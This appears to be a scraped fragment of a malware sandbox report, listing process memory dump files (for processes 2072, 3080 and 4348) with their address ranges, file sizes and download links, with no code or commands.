memory/2072-9-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/2072-6-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/2072-152-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/2072-8-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/2072-154-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/2072-3-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/3080-151-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/4348-112-0x0000000000080000-0x00000000000E2000-memory.dmp

Filesize
392KB

Download